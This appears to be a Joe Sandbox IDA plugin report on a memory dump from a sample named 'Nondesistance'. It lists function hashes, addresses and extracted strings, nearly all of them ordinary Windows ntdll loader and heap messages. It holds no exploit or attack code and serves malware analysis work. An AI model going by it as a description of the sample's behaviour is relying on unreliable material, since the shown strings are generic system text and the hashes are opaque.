                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                  • API String ID: 0-2515994595
                                                                                                  • Opcode ID: 3fc214265583949e06c785206db56e2b1d5e07973a7bfebc9637fcdad768a93e
                                                                                                  • Instruction ID: 1ee748aa449bda5509d89f5d9c17b44fdc02f055095daffdafc1e9b3d244da26
                                                                                                  • Opcode Fuzzy Hash: 3fc214265583949e06c785206db56e2b1d5e07973a7bfebc9637fcdad768a93e
                                                                                                  • Instruction Fuzzy Hash: 93518FB5504351ABD315CF19AA48BEBBBECEB84364F404D1DFA6983240EB71D704CBA2
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                  • API String ID: 3446177414-1745908468
                                                                                                  • Opcode ID: 938aa628cd0b123c786862ed9728b9d356ee2781b7063b0b9c6386239e6f4b69
                                                                                                  • Instruction ID: 45d959fcb5753920410e8db78f00e6459d3e8a3bafea18cf32d66e257f5a68f4
                                                                                                  • Opcode Fuzzy Hash: 938aa628cd0b123c786862ed9728b9d356ee2781b7063b0b9c6386239e6f4b69
                                                                                                  • Instruction Fuzzy Hash: 6B91EC39911645EFEB02CFA8C840AEDBBF2FF49314F548859E845EB251CB7A9A41CB50
                                                                                                  APIs
                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 324E651C
                                                                                                    • Part of subcall function 324E6565: RtlDebugPrintTimes.NTDLL ref: 324E6614
                                                                                                    • Part of subcall function 324E6565: RtlDebugPrintTimes.NTDLL ref: 324E665F
                                                                                                  Strings
                                                                                                  • LdrpInitShimEngine, xrefs: 32549783, 32549796, 325497BF
                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3254977C
                                                                                                  • apphelp.dll, xrefs: 324E6446
                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 325497B9
                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32549790
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 325497A0, 325497C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-204845295
                                                                                                  • Opcode ID: e648ac12144ccbbfad363b5433b679f63b01f6e10fa62fe4b31ad4704c143790
                                                                                                  • Instruction ID: ad7bc6b9a1f3599022c894a0bc9173971cc4f633c6c836e02675de3ab9149327
                                                                                                  • Opcode Fuzzy Hash: e648ac12144ccbbfad363b5433b679f63b01f6e10fa62fe4b31ad4704c143790
                                                                                                  • Instruction Fuzzy Hash: 5551BD712493009FE314CF24D892EABB7E8EB84345F404D59FA85971A2DB70DB45CB92
                                                                                                  Strings
                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324ED263
                                                                                                  • @, xrefs: 324ED09D
                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324ED0E6
                                                                                                  • @, xrefs: 324ED2B3
                                                                                                  • @, xrefs: 324ED24F
                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324ED202
                                                                                                  • h.Q2, xrefs: 3254A5D2
                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324ED06F
                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 324ED136
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.Q2
                                                                                                  • API String ID: 0-4234794107
                                                                                                  • Opcode ID: c1a11a9ffdf0ee6d0306f091c9831e7a9d4ada03e8537a5da21ea8f2dfafc7e0
                                                                                                  • Instruction ID: d6d78e96008d26df4a072c337c2ae8d2274d39413c7ee2ecd7a8cdff2756664b
                                                                                                  • Opcode Fuzzy Hash: c1a11a9ffdf0ee6d0306f091c9831e7a9d4ada03e8537a5da21ea8f2dfafc7e0
                                                                                                  • Instruction Fuzzy Hash: 63A14DB5508345DFE722CF14C540B9BF7E8AB8875AF40492EFA8996240DB74DA48CF92
                                                                                                  APIs
                                                                                                  • RtlDebugPrintTimes.NTDLL ref: 3251D879
                                                                                                    • Part of subcall function 324F4779: RtlDebugPrintTimes.NTDLL ref: 324F4817
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-1975516107
                                                                                                  • Opcode ID: 2a38a8725328263a953186849bd632b2a7e3ea6e64fdb747d8d6a876cf5f912a
                                                                                                  • Instruction ID: 88c63b714d580abfe1a17e96bc3effc1677755c94597cc70a53bc2bafa5b26fc
                                                                                                  • Opcode Fuzzy Hash: 2a38a8725328263a953186849bd632b2a7e3ea6e64fdb747d8d6a876cf5f912a
                                                                                                  • Instruction Fuzzy Hash: 9351F075A06345DFEB08CFA4C58479DBBF1BF84318F644459D801AB281DBB4AB82CF80
                                                                                                  Strings
                                                                                                  • VerifierDebug, xrefs: 32578925
                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 325786BD
                                                                                                  • HandleTraces, xrefs: 3257890F
                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 3257880F
                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 325786E7
                                                                                                  • VerifierDlls, xrefs: 3257893D
                                                                                                  • VerifierFlags, xrefs: 325788D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                  • API String ID: 0-3223716464
                                                                                                  • Opcode ID: 6b01034e9bdbc8aa11b9f4347eec97ef31756a161007dc9b803d6a83b6f22260
                                                                                                  • Instruction ID: 20ddfb17727412210ff6f1b0585a351af642a28e1c00b3b53b51921d0fa1ba1a
                                                                                                  • Opcode Fuzzy Hash: 6b01034e9bdbc8aa11b9f4347eec97ef31756a161007dc9b803d6a83b6f22260
                                                                                                  • Instruction Fuzzy Hash: 63911072981351EFE311CF2C9988B9ABBA5AF80728F844C58F9416B241CB70DF05DB92
                                                                                                  Strings
                                                                                                  • LdrpDynamicShimModule, xrefs: 3255A7A5
                                                                                                  • DGL2, xrefs: 32512382
                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3255A79F
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3255A7AF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DGL2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1134985220
                                                                                                  • Opcode ID: 1b69afe3170f0d546fe8f7272e9ff0c3d0c180642eb10733fc8417e69c5dc865
                                                                                                  • Instruction ID: 3b7ded4dca1252e201bc219bc834dff51295e7384ffff3f9b20e6b8bca7abbf3
                                                                                                  • Opcode Fuzzy Hash: 1b69afe3170f0d546fe8f7272e9ff0c3d0c180642eb10733fc8417e69c5dc865
                                                                                                  • Instruction Fuzzy Hash: 9C314A75A51200FBF7149F18C890BA97BB5FBC4764F24045AF902B7251DB70AB83CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-523794902
                                                                                                  • Opcode ID: 24ccc088c92a84d1acfa8769405346672bd14457ef484779bed9d6c106e7bda7
                                                                                                  • Instruction ID: 3b2cd44bcc81d20db1ca0d4315eb2585fd603b16adbecd633a4df651313820af
                                                                                                  • Opcode Fuzzy Hash: 24ccc088c92a84d1acfa8769405346672bd14457ef484779bed9d6c106e7bda7
                                                                                                  • Instruction Fuzzy Hash: 5142CC752053819FE305CF28C884B2ABBE5FF84389F45496DE896CB351DB74DA82CB52
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.Q2
                                                                                                  • API String ID: 0-3982503027
                                                                                                  • Opcode ID: 94a20686a8ed4cc19628262c1ee1ec58f00a3239d8f6eaf817a933e5eafe08d3
                                                                                                  • Instruction ID: 5d4f781f63ccf4b6dac58cf982bf029b93e3cc35510bc7256a3cf19f12859ee9
                                                                                                  • Opcode Fuzzy Hash: 94a20686a8ed4cc19628262c1ee1ec58f00a3239d8f6eaf817a933e5eafe08d3
                                                                                                  • Instruction Fuzzy Hash: F0F13CB6D11218EFDF16DF98C984A9EBBB8FF48754F50446AE501A7210DBB4AF01CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                  • API String ID: 0-122214566
                                                                                                  • Opcode ID: 3b0158935fcaa03a747157117803e0f95babd034b919adf4b130ffa29b182bb8
                                                                                                  • Instruction ID: 8561c1bcb5da0d94e174f325db7516162262f253f965bd8307575156c77582f8
                                                                                                  • Opcode Fuzzy Hash: 3b0158935fcaa03a747157117803e0f95babd034b919adf4b130ffa29b182bb8
                                                                                                  • Instruction Fuzzy Hash: AAC12D75A00359ABEB148B64CCD57BE7B61AF49308F64C46ADC029B290DF74DF44CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-792281065
                                                                                                  • Opcode ID: c76d312aef71df615e366f50ea5cada9e6880a47d2a6a261636139dfda34569d
                                                                                                  • Instruction ID: 0ed484aa60b06990787e429a7187bf9db9d997f8ecc724f60c3c8ba564fe6d97
                                                                                                  • Opcode Fuzzy Hash: c76d312aef71df615e366f50ea5cada9e6880a47d2a6a261636139dfda34569d
                                                                                                  • Instruction Fuzzy Hash: D7914870A53325EFE725CF14C944BFE7BA1AF50769F401469EA106B2C1DBB09B42CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                  • API String ID: 0-4253913091
                                                                                                  • Opcode ID: 6ed4c6a6948422937376ee3a632170a1f90ce69240cd22f77669f11aa0f215e6
                                                                                                  • Instruction ID: aeb32cf029b71c672bea017787b78e1767490b1bd9f7b3d8e46373f03f73310d
                                                                                                  • Opcode Fuzzy Hash: 6ed4c6a6948422937376ee3a632170a1f90ce69240cd22f77669f11aa0f215e6
                                                                                                  • Instruction Fuzzy Hash: 7AF1BF75A00605DFEB09CF69C894B6ABBF5FF44344F208569E8069B391DB74EA81CF90
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                  • API String ID: 3446177414-2283098728
                                                                                                  • Opcode ID: 1084618e707913801d2493205bf2c12d4047e7b32ffc1b9c467914d0c3c56734
                                                                                                  • Instruction ID: c1a5e2130b685b7c6fd38e1353290571a768db8193404f650983bc36793118b9
                                                                                                  • Opcode Fuzzy Hash: 1084618e707913801d2493205bf2c12d4047e7b32ffc1b9c467914d0c3c56734
                                                                                                  • Instruction Fuzzy Hash: EC510375601701ABFB14DF38C880B59BBA1BFC5364F540A6DE84397291EBB0BB45CB82
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 325680E9
                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 325680E2
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 325680F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-1783798831
                                                                                                  • Opcode ID: 311564f9ffe8cef74b209594b266669552435197ff9e445b7b72afae8d4faf67
                                                                                                  • Instruction ID: dc04bd52722138e42e0b877748ddb510188503f3f240d5db6a7ecd5b5a365fae
                                                                                                  • Opcode Fuzzy Hash: 311564f9ffe8cef74b209594b266669552435197ff9e445b7b72afae8d4faf67
                                                                                                  • Instruction Fuzzy Hash: D04114B5562300EBD720DF28CC44B9B7BE8AF84795F41592AF848A72D1DB70EB41CB91
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32574508
                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 32574519
                                                                                                  • LdrpCheckRedirection, xrefs: 3257450F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                  • API String ID: 3446177414-3154609507
                                                                                                  • Opcode ID: 843d04358b053cd02e71a1f7f746fe6921997e7f18bdcf1e0ebf30f119cc60c7
                                                                                                  • Instruction ID: b2cd6a0352a955bf2f7655b34dc872bb80b7a71d12504617435be54e1f093c28
                                                                                                  • Opcode Fuzzy Hash: 843d04358b053cd02e71a1f7f746fe6921997e7f18bdcf1e0ebf30f119cc60c7
                                                                                                  • Instruction Fuzzy Hash: E141DF76685321DBDB10CF5CC840A56BBF6AF88796F050AB9ECC8E7251DB30DA00DB91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446177414-0
                                                                                                  • Opcode ID: f72e956ac1848aab8816b76ba4e699c5d3827b8b4cf3c1a3863a293b3bf8b385
                                                                                                  • Instruction ID: 6aa78071efe96d7e7abc621165338f10effd45ab135b54d7758a0a780e82ff4a
                                                                                                  • Opcode Fuzzy Hash: f72e956ac1848aab8816b76ba4e699c5d3827b8b4cf3c1a3863a293b3bf8b385
                                                                                                  • Instruction Fuzzy Hash: 95F1E8B7E006259BCB08CFA8C99067DFFF5AF88210B55416DD496EB380EA74EB41CB50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                  • API String ID: 0-3061284088
                                                                                                  • Opcode ID: 037ee038204aa4bd1927ddf93fbd7f9aa206e9ac72b692de3b7cca137b600136
                                                                                                  • Instruction ID: fcccf96571e18332b5217adc0b5631440e7f0f10a822a56c9f9b0afe675e251c
                                                                                                  • Opcode Fuzzy Hash: 037ee038204aa4bd1927ddf93fbd7f9aa206e9ac72b692de3b7cca137b600136
                                                                                                  • Instruction Fuzzy Hash: 6C01707A016150FFF345872DD41AF86BBE8FB41737F15488DF0014B790CEA59940DA50
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • kLsE, xrefs: 324F05FE
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 324F0586
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 3446177414-2547482624
                                                                                                  • Opcode ID: b9080ac5cf02c97148a1736da4add6bd123c9628714a465c4dd810ef4dcf5d89
                                                                                                  • Instruction ID: 4e40a9d1d23097710f576fba77dfcb72747744163903899532e1f3449c7d64ab
                                                                                                  • Opcode Fuzzy Hash: b9080ac5cf02c97148a1736da4add6bd123c9628714a465c4dd810ef4dcf5d89
                                                                                                  • Instruction Fuzzy Hash: 2151DFB5A00746EFEB14CFA4C4407EAB7F4AFC4304F00A83ED99597244EBB29645CBA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                  • API String ID: 0-379654539
                                                                                                  • Opcode ID: 5845111c47ecbb19d1e1a511e8d42ea506ed89076eb42200f025d792ec77859b
                                                                                                  • Instruction ID: 4665dbfc1cadbbf74d64085d7a8384d1de32b0996c6169f118a7e3072db78e78
                                                                                                  • Opcode Fuzzy Hash: 5845111c47ecbb19d1e1a511e8d42ea506ed89076eb42200f025d792ec77859b
                                                                                                  • Instruction Fuzzy Hash: 46C18B74108392DFE315CF58C540B5AB7E4BFC4B48F40896AF895CB250EB75CA8ACB52
                                                                                                  Strings
                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3252847E
                                                                                                  • LdrpInitializeProcess, xrefs: 32528342
                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 32528341
                                                                                                  • @, xrefs: 325284B1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 0-1918872054
                                                                                                  • Opcode ID: 4092d92cd8763e8fbd899e9155aced30fc9dc54e68270da1ba29b8b360693887
                                                                                                  • Instruction ID: 6938283e262d3ca5aa7b53120b53505e4ad6c7c522a9595ad6f013cbb14b4ce3
                                                                                                  • Opcode Fuzzy Hash: 4092d92cd8763e8fbd899e9155aced30fc9dc54e68270da1ba29b8b360693887
                                                                                                  • Instruction Fuzzy Hash: 3D918371509340AFE721DF60DD44FABBBECAB84788F80592DFA84D2190E774DA44CB62
                                                                                                  Strings
                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 32561FE8
                                                                                                  • .Local, xrefs: 325227F8
                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32561FE3, 325620BB
                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 325620C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
